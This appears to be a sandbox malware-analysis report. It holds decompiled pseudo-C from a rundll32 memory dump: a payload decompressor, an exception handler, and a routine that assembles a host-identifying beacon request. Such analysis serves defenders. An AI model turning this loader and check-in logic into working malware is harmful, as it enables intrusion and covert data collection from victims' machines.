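                When unpacking a payload carved from a dump, remember that the routine returns only the output length and consumes input until it meets the "110" end marker; feed it the whole remaining buffer rather than a guessed length, and keep the output bound so a damaged region cannot exhaust memory.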

                C-Code - Quality: 93%
                			E04B92FED(intOrPtr* __eax, char* _a4) {
                				unsigned int _v12;
                				unsigned int _v16;
                				char* _v20;
                				signed int _v24;
                				char _v32;
                				signed char* _v40;
                				signed int _t185;
                				signed int _t195;
                				intOrPtr* _t197;
                				intOrPtr* _t208;
                				void* _t220;
                				intOrPtr* _t222;
                				char* _t227;
                				void* _t234;
                				char* _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t244;
                				signed int _t246;
                				signed int _t248;
                				signed int _t252;
                				signed int _t254;
                				char _t256;
                				signed int _t257;
                				signed int _t259;
                				char _t261;
                				signed int _t262;
                				char _t266;
                				signed int _t267;
                				signed int _t270;
                				signed int _t272;
                				unsigned int _t273;
                				signed int _t275;
                				void* _t276;
                				void* _t277;
                				signed int _t279;
                				signed int _t280;
                				unsigned int _t282;
                				unsigned int _t283;
                				void* _t284;
                
                				_t237 = _a4;
                				_t270 = 0;
                				_t277 = 0;
                				 *_t237 =  *((intOrPtr*)(__eax));
                				_t234 = 8;
                				_v20 = _t237 + 1;
                				_v12 = 0;
                				_v32 = 0;
                				_v16 = 0;
                				_v40 = __eax + 1;
                				_t7 = _t234 + 0x78; // 0x80
                				_t239 = _t7;
                				do {
                					_t8 =  &_v32;
                					 *_t8 = _v32 - 1;
                					asm("bt dword [eax], 0x1f");
                					if( *_t8 >= 0) {
                						_t241 = _v24;
                					} else {
                						_v40 =  &(_v40[1]);
                						_t241 =  *_v40 & 0x000000ff;
                						_v32 = _v32 + _t234;
                					}
                					_v24 = _t241 + _t241;
                					if((_t241 & _t239 & 0xffffff80) == 0) {
                						_v20 = _v20 + 1;
                						_v40 =  &(_v40[1]);
                						 *_v20 =  *_v40;
                						goto L74;
                					} else {
                						_t20 =  &_v32;
                						 *_t20 = _v32 - 1;
                						asm("bt dword [eax], 0x1f");
                						if( *_t20 >= 0) {
                							_t244 = _v24;
                						} else {
                							_v40 =  &(_v40[1]);
                							_t244 =  *_v40 & 0x000000ff;
                							_v32 = _v32 + _t234;
                						}
                						_v24 = _t244 + _t244;
                						if((_t244 & _t239 & 0xffffff80) == 0) {
                							_t272 = 1;
                							do {
                								_t69 =  &_v32;
                								 *_t69 = _v32 - 1;
                								asm("bt dword [eax], 0x1f");
                								if( *_t69 >= 0) {
                									_t246 = _v24;
                								} else {
                									_v40 =  &(_v40[1]);
                									_t246 =  *_v40 & 0x000000ff;
                									_v32 = _v32 + _t234;
                								}
                								_t78 =  &_v32;
                								 *_t78 = _v32 - 1;
                								_t272 = ((_t246 & _t239) >> 7) + _t272 * 2;
                								_v24 = _t246 + _t246;
                								asm("bt dword [eax], 0x1f");
                								if( *_t78 >= 0) {
                									_t248 = _v24;
                								} else {
                									_v40 =  &(_v40[1]);
                									_t248 =  *_v40 & 0x000000ff;
                									_v32 = _v32 + _t234;
                								}
                								_v24 = _t248 + _t248;
                							} while ((_t248 & _t239 & 0xffffff80) != 0);
                							if(_t277 != 0) {
                								_t123 = _t272 - 2; // -1
                								_t185 = _t123;
                								goto L53;
                							} else {
                								if(_t272 != 2) {
                									_t122 = _t272 - 3; // -2
                									_t185 = _t122;
                									L53:
                									_v40 =  &(_v40[1]);
                									_t273 = (_t185 << 8) + ( *_v40 & 0x000000ff);
                									_t279 = 1;
                									do {
                										_t127 =  &_v32;
                										 *_t127 = _v32 - 1;
                										asm("bt dword [eax], 0x1f");
                										if( *_t127 >= 0) {
                											_t252 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t252 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_t136 =  &_v32;
                										 *_t136 = _v32 - 1;
                										_t279 = ((_t252 & _t239) >> 7) + _t279 * 2;
                										_v24 = _t252 + _t252;
                										asm("bt dword [eax], 0x1f");
                										if( *_t136 >= 0) {
                											_t254 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t254 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_v24 = _t254 + _t254;
                									} while ((_t254 & _t239 & 0xffffff80) != 0);
                									_t195 = _t279;
                									if(_t273 < _t239) {
                										_t151 = _t279 + 2; // 0x3
                										_t195 = _t151;
                									}
                									if(_t273 >= 0x7d00) {
                										_t195 = _t195 + 1;
                									}
                									if(_t273 >= 0x500) {
                										_t195 = _t195 + 1;
                									}
                									_t280 = _t195;
                									if(_t195 != 0) {
                										_t197 = _v20 - _t273;
                										do {
                											_t256 =  *_t197;
                											_v20 = _v20 + 1;
                											_t197 = _t197 + 1;
                											_t280 = _t280 - 1;
                											 *_v20 = _t256;
                										} while (_t280 != 0);
                										_t234 = 8;
                									}
                									_v12 = _t273;
                								} else {
                									_t275 = 1;
                									do {
                										_t93 =  &_v32;
                										 *_t93 = _v32 - 1;
                										asm("bt dword [eax], 0x1f");
                										if( *_t93 >= 0) {
                											_t257 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t257 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_t102 =  &_v32;
                										 *_t102 = _v32 - 1;
                										_t275 = ((_t257 & _t239) >> 7) + _t275 * 2;
                										_v24 = _t257 + _t257;
                										asm("bt dword [eax], 0x1f");
                										if( *_t102 >= 0) {
                											_t259 = _v24;
                										} else {
                											_v40 =  &(_v40[1]);
                											_t259 =  *_v40 & 0x000000ff;
                											_v32 = _v32 + _t234;
                										}
                										_v24 = _t259 + _t259;
                									} while ((_t259 & _t239 & 0xffffff80) != 0);
                									if(_t275 != 0) {
                										_t208 = _v20 - _v12;
                										do {
                											_t261 =  *_t208;
                											_v20 = _v20 + 1;
                											_t208 = _t208 + 1;
                											_t275 = _t275 - 1;
                											 *_v20 = _t261;
                										} while (_t275 != 0);
                									}
                								}
                							}
                							goto L72;
                						} else {
                							_t32 =  &_v32;
                							 *_t32 = _v32 - 1;
                							asm("bt dword [eax], 0x1f");
                							if( *_t32 >= 0) {
                								_t262 = _v24;
                							} else {
                								_v40 =  &(_v40[1]);
                								_t262 =  *_v40 & 0x000000ff;
                								_v32 = _v32 + _t234;
                							}
                							_v24 = _t262 + _t262;
                							if((_t262 & _t239 & 0xffffff80) == 0) {
                								_t282 =  *_v40 & 0x000000ff;
                								_v40 =  &(_v40[1]);
                								_t220 = (_t282 & 1) + 2;
                								_t283 = _t282 >> 1;
                								if(_t283 == 0) {
                									_v16 = 1;
                								} else {
                									_t276 = _t220;
                									if(_t220 != 0) {
                										_t222 = _v20 - _t283;
                										do {
                											_t266 =  *_t222;
                											_v20 = _v20 + 1;
                											_t222 = _t222 + 1;
                											_t276 = _t276 - 1;
                											 *_v20 = _t266;
                										} while (_t276 != 0);
                										_t234 = 8;
                									}
                								}
                								_v12 = _t283;
                								L72:
                								_t277 = 1;
                							} else {
                								_t284 = 4;
                								do {
                									_t44 =  &_v32;
                									 *_t44 = _v32 - 1;
                									asm("bt dword [eax], 0x1f");
                									if( *_t44 >= 0) {
                										_t267 = _v24;
                									} else {
                										_v40 =  &(_v40[1]);
                										_t267 =  *_v40 & 0x000000ff;
                										_v32 = _v32 + _t234;
                									}
                									_t284 = _t284 - 1;
                									_v24 = _t267 + _t267;
                									_t270 = ((_t267 & _t239) >> 7) + _t270 * 2;
                								} while (_t284 != 0);
                								_t227 = _v20;
                								if(_t270 == 0) {
                									 *_t227 = 0;
                								} else {
                									 *_v20 =  *((intOrPtr*)(_t227 - _t270));
                								}
                								_v20 = _v20 + 1;
                								L74:
                								_t277 = 0;
                							}
                						}
                					}
                					_t270 = 0;
                				} while (_v16 == 0);
                				return _v20 - _a4;
                			}

                0x04b92ff5
                0x04b92ffb
                0x04b92ffd
                0x04b92fff
                0x04b93005
                0x04b93006
                0x04b93009
                0x04b9300c
                0x04b9300f
                0x04b93012
                0x04b93015
                0x04b93015
                0x04b93018
                0x04b93018
                0x04b93018
                0x04b9301e
                0x04b93022
                0x04b93032
                0x04b93024
                0x04b93027
                0x04b9302a
                0x04b9302d
                0x04b9302d
                0x04b9303b
                0x04b93043
                0x04b932d6
                0x04b932d9
                0x04b932dc
                0x00000000
                0x04b93049
                0x04b93049
                0x04b93049
                0x04b9304f
                0x04b93053
                0x04b93063
                0x04b93055
                0x04b93058
                0x04b9305b
                0x04b9305e
                0x04b9305e
                0x04b9306c
                0x04b93074
                0x04b93137
                0x04b93138
                0x04b93138
                0x04b93138
                0x04b9313e
                0x04b93142
                0x04b93152
                0x04b93144
                0x04b93147
                0x04b9314a
                0x04b9314d
                0x04b9314d
                0x04b9315e
                0x04b9315e
                0x04b93161
                0x04b93167
                0x04b9316a
                0x04b9316e
                0x04b9317e
                0x04b93170
                0x04b93173
                0x04b93176
                0x04b93179
                0x04b93179
                0x04b93187
                0x04b9318a
                0x04b93193
                0x04b93220
                0x04b93220
                0x00000000
                0x04b93199
                0x04b9319c
                0x04b9321b
                0x04b9321b
                0x04b93223
                0x04b9322e
                0x04b93233
                0x04b93235
                0x04b93236
                0x04b93236
                0x04b93236
                0x04b9323c
                0x04b93240
                0x04b93250
                0x04b93242
                0x04b93245
                0x04b93248
                0x04b9324b
                0x04b9324b
                0x04b9325c
                0x04b9325c
                0x04b9325f
                0x04b93265
                0x04b93268
                0x04b9326c
                0x04b9327c
                0x04b9326e
                0x04b93271
                0x04b93274
                0x04b93277
                0x04b93277
                0x04b93285
                0x04b93288
                0x04b9328f
                0x04b93293
                0x04b93295
                0x04b93295
                0x04b93295
                0x04b9329e
                0x04b932a0
                0x04b932a0
                0x04b932a7
                0x04b932a9
                0x04b932a9
                0x04b932aa
                0x04b932ae
                0x04b932b3
                0x04b932b5
                0x04b932b8
                0x04b932ba
                0x04b932bd
                0x04b932be
                0x04b932bf
                0x04b932bf
                0x04b932c5
                0x04b932c5
                0x04b932c6
                0x04b9319e
                0x04b931a0
                0x04b931a1
                0x04b931a1
                0x04b931a1
                0x04b931a7
                0x04b931ab
                0x04b931bb
                0x04b931ad
                0x04b931b0
                0x04b931b3
                0x04b931b6
                0x04b931b6
                0x04b931c7
                0x04b931c7
                0x04b931ca
                0x04b931d0
                0x04b931d3
                0x04b931d7
                0x04b931e7
                0x04b931d9
                0x04b931dc
                0x04b931df
                0x04b931e2
                0x04b931e2
                0x04b931f0
                0x04b931f3
                0x04b931fc
                0x04b93205
                0x04b93208
                0x04b9320b
                0x04b9320d
                0x04b93210
                0x04b93211
                0x04b93212
                0x04b93212
                0x04b93216
                0x04b931fc
                0x04b9319c
                0x00000000
                0x04b9307a
                0x04b9307a
                0x04b9307a
                0x04b93080
                0x04b93084
                0x04b93094
                0x04b93086
                0x04b93089
                0x04b9308c
                0x04b9308f
                0x04b9308f
                0x04b9309d
                0x04b930a5
                0x04b930f9
                0x04b930fc
                0x04b93107
                0x04b93108
                0x04b9310a
                0x04b9312a
                0x04b9310c
                0x04b9310c
                0x04b93110
                0x04b93115
                0x04b93117
                0x04b9311a
                0x04b9311c
                0x04b9311f
                0x04b93120
                0x04b93121
                0x04b93121
                0x04b93127
                0x04b93127
                0x04b93110
                0x04b9312d
                0x04b932c9
                0x04b932cb
                0x04b930a7
                0x04b930a9
                0x04b930aa
                0x04b930aa
                0x04b930aa
                0x04b930b0
                0x04b930b4
                0x04b930c4
                0x04b930b6
                0x04b930b9
                0x04b930bc
                0x04b930bf
                0x04b930bf
                0x04b930d0
                0x04b930d1
                0x04b930d4
                0x04b930d4
                0x04b930d9
                0x04b930de
                0x04b930eb
                0x04b930e0
                0x04b930e7
                0x04b930e7
                0x04b930ee
                0x04b932de
                0x04b932de
                0x04b932de
                0x04b930a5
                0x04b93074
                0x04b932e0
                0x04b932e2
                0x04b932f5

                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction ID: 44b07584e8ac5682434bb92496721966e7890af99fa400069126c1710d39109d
                • Opcode Fuzzy Hash: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction Fuzzy Hash: 2AC14C31E0415A8FCF09CF99C8815FEB7F1EF89310B1895A6D861B7255D639AE02DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00402344(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E004024AB(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E00402565(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E00402450(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E004024AB(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E00402547(_t82[2], 1);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])();
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}

                0x00402348
                0x00402349
                0x0040234a
                0x0040234d
                0x0040234f
                0x00402352
                0x00402353
                0x00402355
                0x00402356
                0x00402357
                0x0040235a
                0x00402364
                0x00402415
                0x0040241c
                0x00402425
                0x0040236a
                0x0040236a
                0x00402370
                0x00402376
                0x00402379
                0x0040237c
                0x00402380
                0x00402385
                0x0040238a
                0x0040240a
                0x00000000
                0x0040238c
                0x0040238c
                0x00402398
                0x0040239a
                0x004023f5
                0x004023f5
                0x004023fb
                0x00000000
                0x0040239c
                0x004023ab
                0x004023ad
                0x004023ae
                0x004023af
                0x004023b2
                0x004023b2
                0x004023b4
                0x00000000
                0x004023b6
                0x004023b6
                0x00402400
                0x004023b8
                0x004023b8
                0x004023bc
                0x004023c4
                0x004023c9
                0x004023ce
                0x004023da
                0x004023e2
                0x004023e9
                0x004023ef
                0x004023f3
                0x00000000
                0x004023f3
                0x004023b6
                0x004023b4
                0x00000000
                0x0040239a
                0x0040240e
                0x0040240e
                0x0040240e
                0x0040238a
                0x0040242a
                0x00402431

                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction ID: b479ffddf21c4ea789bd4d07820d51ba5b50ca91345b5b8c0003f012d5d4788e
                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                • Instruction Fuzzy Hash: 5B21C432900204ABCB14EF69C9C89A7B7A5FF48354B45807AEC15AB2C6DB74F915C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E04B983CC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E04B98537(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E04B985F1(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E04B984DC(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E04B98537(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E04B985D3(_t82[2]);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])(1);
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}

                0x04b983d0
                0x04b983d1
                0x04b983d2
                0x04b983d5
                0x04b983d7
                0x04b983da
                0x04b983db
                0x04b983dd
                0x04b983de
                0x04b983df
                0x04b983e2
                0x04b983ec
                0x04b9849d
                0x04b984a4
                0x04b984ad
                0x04b983f2
                0x04b983f2
                0x04b983f8
                0x04b983fe
                0x04b98401
                0x04b98404
                0x04b98408
                0x04b9840d
                0x04b98412
                0x04b98492
                0x00000000
                0x04b98414
                0x04b98414
                0x04b98420
                0x04b98422
                0x04b9847d
                0x04b9847d
                0x04b98483
                0x00000000
                0x04b98424
                0x04b98433
                0x04b98435
                0x04b98436
                0x04b98437
                0x04b9843a
                0x04b9843a
                0x04b9843c
                0x00000000
                0x04b9843e
                0x04b9843e
                0x04b98488
                0x04b98440
                0x04b98440
                0x04b98444
                0x04b9844c
                0x04b98451
                0x04b98456
                0x04b98462
                0x04b9846a
                0x04b98471
                0x04b98477
                0x04b9847b
                0x00000000
                0x04b9847b
                0x04b9843e
                0x04b9843c
                0x00000000
                0x04b98422
                0x04b98496
                0x04b98496
                0x04b98496
                0x04b98412
                0x04b984b2
                0x04b984b9

                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: d9ce20ecb6a8aa3fb582a894a034a446d6d29b13a3e52508439d41391f165d04
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: CE2190329102049FDF10EF68C8809ABBBE5FF46360B4A81B8D9559B245EB30FD15CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E04B911DD(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                				intOrPtr _v4;
                				signed int _v8;
                				int* _v12;
                				char* _v16;
                				intOrPtr _v20;
                				void* _v24;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				long _t68;
                				intOrPtr _t69;
                				intOrPtr _t70;
                				intOrPtr _t71;
                				intOrPtr _t72;
                				intOrPtr _t73;
                				void* _t76;
                				intOrPtr _t77;
                				int _t80;
                				intOrPtr _t81;
                				intOrPtr _t85;
                				intOrPtr _t86;
                				intOrPtr _t87;
                				void* _t89;
                				void* _t92;
                				intOrPtr _t96;
                				intOrPtr _t100;
                				intOrPtr* _t102;
                				int* _t108;
                				int* _t118;
                				char** _t120;
                				char* _t121;
                				intOrPtr* _t126;
                				intOrPtr* _t128;
                				intOrPtr* _t130;
                				intOrPtr* _t132;
                				intOrPtr _t135;
                				intOrPtr _t139;
                				int _t142;
                				intOrPtr _t144;
                				int _t147;
                				intOrPtr _t148;
                				int _t151;
                				void* _t152;
                				intOrPtr _t166;
                				void* _t168;
                				int _t169;
                				void* _t170;
                				void* _t171;
                				long _t172;
                				intOrPtr* _t173;
                				intOrPtr* _t174;
                				intOrPtr _t175;
                				intOrPtr* _t178;
                				char** _t181;
                				char** _t183;
                				char** _t184;
                				void* _t189;
                
                				_t68 = __eax;
                				_t181 =  &_v16;
                				_t152 = _a20;
                				_a20 = 8;
                				if(__eax == 0) {
                					_t68 = GetTickCount();
                				}
                				_t69 =  *0x4b9a018; // 0x2e793154
                				asm("bswap eax");
                				_t70 =  *0x4b9a014; // 0x3a87c8cd
                				asm("bswap eax");
                				_t71 =  *0x4b9a010; // 0xd8d2f808
                				asm("bswap eax");
                				_t72 =  *0x4b9a00c; // 0x13d015ef
                				asm("bswap eax");
                				_t73 =  *0x4b9a348; // 0x56d5a8
                				_t3 = _t73 + 0x4b9b62b; // 0x74666f73
                				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18a, _t72, _t71, _t70, _t69,  *0x4b9a02c,  *0x4b9a004, _t68);
                				_t76 = E04B967F4();
                				_t77 =  *0x4b9a348; // 0x56d5a8
                				_t4 = _t77 + 0x4b9b66b; // 0x74707526
                				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                				_t183 =  &(_t181[0xe]);
                				_t170 = _t169 + _t80;
                				if(_a24 != 0) {
                					_t148 =  *0x4b9a348; // 0x56d5a8
                					_t8 = _t148 + 0x4b9b676; // 0x732526
                					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                					_t183 =  &(_t183[3]);
                					_t170 = _t170 + _t151;
                				}
                				_t81 =  *0x4b9a348; // 0x56d5a8
                				_t10 = _t81 + 0x4b9b78e; // 0x5108d36
                				_t153 = _t10;
                				_t189 = _a20 - _t10;
                				_t12 = _t81 + 0x4b9b2de; // 0x74636126
                				_t164 = 0 | _t189 == 0x00000000;
                				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                				_t85 =  *0x4b9a36c; // 0x51095b0
                				_t184 =  &(_t183[3]);
                				if(_t85 != 0) {
                					_t144 =  *0x4b9a348; // 0x56d5a8
                					_t16 = _t144 + 0x4b9b889; // 0x3d736f26
                					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t147;
                				}
                				_t86 = E04B924C5(_t153);
                				_a32 = _t86;
                				if(_t86 != 0) {
                					_t139 =  *0x4b9a348; // 0x56d5a8
                					_t19 = _t139 + 0x4b9b8c2; // 0x736e6426
                					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t142;
                					HeapFree( *0x4b9a2d8, 0, _a40);
                				}
                				_t87 = E04B96173();
                				_a32 = _t87;
                				if(_t87 != 0) {
                					_t135 =  *0x4b9a348; // 0x56d5a8
                					_t23 = _t135 + 0x4b9b8ca; // 0x6f687726
                					wsprintfA(_t171 + _t152, _t23, _t87);
                					_t184 =  &(_t184[3]);
                					HeapFree( *0x4b9a2d8, 0, _a40);
                				}
                				_t166 =  *0x4b9a3cc; // 0x5109600
                				_t89 = E04B96107(0x4b9a00a, _t166 + 4);
                				_t172 = 0;
                				_a16 = _t89;
                				if(_t89 == 0) {
                					L30:
                					HeapFree( *0x4b9a2d8, _t172, _t152);
                					return _a44;
                				} else {
                					_t92 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x800);
                					_a24 = _t92;
                					if(_t92 == 0) {
                						L29:
                						HeapFree( *0x4b9a2d8, _t172, _a8);
                						goto L30;
                					}
                					E04B952F6(GetTickCount());
                					_t96 =  *0x4b9a3cc; // 0x5109600
                					__imp__(_t96 + 0x40);
                					asm("lock xadd [eax], ecx");
                					_t100 =  *0x4b9a3cc; // 0x5109600
                					__imp__(_t100 + 0x40);
                					_t102 =  *0x4b9a3cc; // 0x5109600
                					_t168 = E04B95D8A(1, _t164, _t152,  *_t102);
                					asm("lock xadd [eax], ecx");
                					if(_t168 == 0) {
                						L28:
                						HeapFree( *0x4b9a2d8, _t172, _a16);
                						goto L29;
                					}
                					StrTrimA(_t168, 0x4b99294);
                					_push(_t168);
                					_t108 = E04B927B3();
                					_v12 = _t108;
                					if(_t108 == 0) {
                						L27:
                						HeapFree( *0x4b9a2d8, _t172, _t168);
                						goto L28;
                					}
                					_t173 = __imp__;
                					 *_t173(_t168, _a8);
                					 *_t173(_a4, _v12);
                					_t174 = __imp__;
                					 *_t174(_v4, _v24);
                					_t175 = E04B92EAF( *_t174(_v12, _t168), _v20);
                					_v36 = _t175;
                					if(_t175 == 0) {
                						_v8 = 8;
                						L25:
                						E04B9554C();
                						L26:
                						HeapFree( *0x4b9a2d8, 0, _v40);
                						_t172 = 0;
                						goto L27;
                					}
                					_t118 = E04B95B38(_t152, 0xffffffffffffffff, _t168,  &_v24);
                					_v12 = _t118;
                					if(_t118 == 0) {
                						_t178 = _v24;
                						_v20 = E04B97262(_t178, _t175, _v16, _v12);
                						_t126 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                						_t128 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t128 + 8))(_t128);
                						_t130 =  *((intOrPtr*)(_t178 + 4));
                						 *((intOrPtr*)( *_t130 + 8))(_t130);
                						_t132 =  *_t178;
                						 *((intOrPtr*)( *_t132 + 8))(_t132);
                						E04B94130(_t178);
                					}
                					if(_v8 != 0x10d2) {
                						L20:
                						if(_v8 == 0) {
                							_t120 = _v16;
                							if(_t120 != 0) {
                								_t121 =  *_t120;
                								_t176 =  *_v12;
                								_v16 = _t121;
                								wcstombs(_t121, _t121,  *_v12);
                								 *_v24 = E04B95366(_v16, _v16, _t176 >> 1);
                							}
                						}
                						goto L23;
                					} else {
                						if(_v16 != 0) {
                							L23:
                							E04B94130(_v32);
                							if(_v12 == 0 || _v8 == 0x10d2) {
                								goto L26;
                							} else {
                								goto L25;
                							}
                						}
                						_v8 = _v8 & 0x00000000;
                						goto L20;
                					}
                				}
                			}

                0x04b911dd
                0x04b911dd
                0x04b911e1
                0x04b911e8
                0x04b911f2
                0x04b911f4
